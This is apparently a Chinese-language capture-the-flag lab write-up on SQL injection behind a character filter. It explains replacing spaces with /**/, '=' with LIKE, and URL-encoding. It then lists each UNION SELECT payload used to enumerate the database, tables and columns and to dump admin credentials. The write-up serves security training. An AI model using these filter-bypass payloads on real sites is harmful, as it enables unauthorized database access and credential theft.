思路:注入嘛,那就是该试的都试试,然后你会发现单引号页面跳转了虽然没有和之前一样有sql报错什么的,而且空格order,by ,select什么的字符都被过滤
那么就是要用url编码的方式去绕过滤,值得注意的是空格用/**/代替,=用like代替
简单说就是和正常注入的不同的地方就是每一步注入的代码都要换成url编码的形式再去注入,然后就和正常注入没什么区别了
ps:这里其实一开始我也没什么思路的QAQ,然后就无脑sqlmap了,后面会发现sqlmap抛出来的账号密码都不行,所以还是得手注可恶
总结:字符过滤,编码绕过
登入点开注入页面什么的就不截图了
直接上开始构造注入语句
/**/order/**/by/**/4页面正常
/**/order/**/by/**/5页面又错了,说明列还是4
然后就看显示点,这里要主要把id=1 改成2或者-1啥都的都行,反正别让正常页面出来就行
/**/union/**/select/**/1,2,3,4
然后就找数据库和版本咯
/**/union/**/select/**/1,database(),version(),4
然后就是找表咯,这里要先把数据库名换成ASCLL格式,前面加个0x然后再拿去url加密,为什么呢,大概就是0xASCLL格式才能被数据库读懂,然后呢就是再一起去url编码
/**/union/**/select/**/1,group_concat(table_name),3,4/**/from/**/information_schema.tables/**/where/**/table_schema/**/like/**/0x6d6f7a68655f64697363757a5f73746f726d67726f7570
找完表就是找字段
和前面一样要把表换成ASCLL然后前面加0x
/**/union/**/select/**/1,group_concat(column_name),3,4/**/from/**/information_schema.columns/**/where/**/table_name/**/like/**/0x73746f726d67726f75705f6d656d626572
然后就是找数据咯
/**/union/**/select/**/1,group_concat(name,password),3,4/**/from/**/stormgroup_member
md5
用admin/470117登入成功拿到key